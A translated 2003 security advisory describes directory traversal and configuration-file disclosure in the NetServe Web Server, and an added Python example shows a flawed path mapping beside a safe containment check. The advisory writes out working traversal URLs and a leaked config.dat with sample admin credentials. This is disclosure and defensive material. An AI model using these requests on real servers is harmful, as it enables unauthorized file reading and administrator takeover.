Translated and compiled by vitter@safechina.net
Application : NetServe Web Server
Date : 17.11.2003
Version : 1.0.7 (or earlier)
Platform : Windows NT, 95, 98, 2000, and XP.
Severity : High
Local : Yes
Remote : Yes
Tested on : WinXP and Win2K.

Description: New security flaws in NetServe

Details:
NetServe is an application that provides web serving and file sharing, running on the Windows NT, 95, 98, 2000, and XP platforms. The flaws allow a remote attacker to browse arbitrary directories, read the server configuration file, and obtain the NetServe administrator password.

1) Directory traversal:
NetServe does not correctly filter the special "/../../" character sequence in submitted requests, which allows an attacker to view all files under the HTML root directory.

Attack method:
http://[victim]/../test/ allows viewing the folder /test/
http://[victim]/../test/test.txt allows viewing a file in the /test/ folder

2) The NetServe configuration file is placed under the wwwroot directory by default, and it can be retrieved by sending a crafted URL to the target host. The configuration file contains a line of the following form:

Users username|password|...

Attack method:
http://[victim]/../config.dat

Example of a file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================

3) Using the method above, we can obtain the NetServe administrator's remote administration password, which allows us to completely change the server configuration!

====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====

Solution:
The vendor has not yet released a patch for this flaw. Users should watch the vendor's site for updates:
http://www.starlots.com/netx/index.html
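
The traversal in item 1 comes from mapping the request path onto ServerRoot without canonicalizing it first. The following is an added example, not NetServe's code and not part of the original advisory: it places a flawed mapping beside a containment check that a server could apply before opening a file. The function names are hypothetical, the root is the ServerRoot value from the sample config.dat, and the request paths are constructed.

```python
import ntpath
from urllib.parse import unquote

# ServerRoot value taken from the sample config.dat in the advisory
SERVER_ROOT = r"D:\Program Files\NetServe Web Server\wwwroot"


def naive_map(url_path):
    """Flawed mapping: the request path is appended to the root unchecked."""
    return ntpath.normpath(SERVER_ROOT + url_path.replace("/", "\\"))


def safe_map(url_path):
    """Return the file path for url_path, or None if it leaves SERVER_ROOT."""
    decoded = unquote(url_path)  # decode %2e%2e and similar before checking
    if "\x00" in decoded:
        return None
    rel = decoded.replace("/", "\\").lstrip("\\")
    # join() lets an absolute or drive-qualified rel replace the root, so the
    # containment test below runs on the final canonical path, not on rel.
    candidate = ntpath.normpath(ntpath.join(SERVER_ROOT, rel))
    root = ntpath.normcase(SERVER_ROOT)
    cand = ntpath.normcase(candidate)
    if cand != root and not cand.startswith(root + "\\"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed request paths, modelled on the URLs in the advisory
    for path in ["/index.html", "/../config.dat", "/../test/test.txt",
                 "/%2e%2e/config.dat", "/..\\wwwroot2/x"]:
        print(f"{path!r:24} naive={naive_map(path)!r} safe={safe_map(path)!r}")
```

Comparing against the root plus a trailing separator, rather than the bare root string, is what keeps a sibling directory such as wwwroot2 from passing the prefix test.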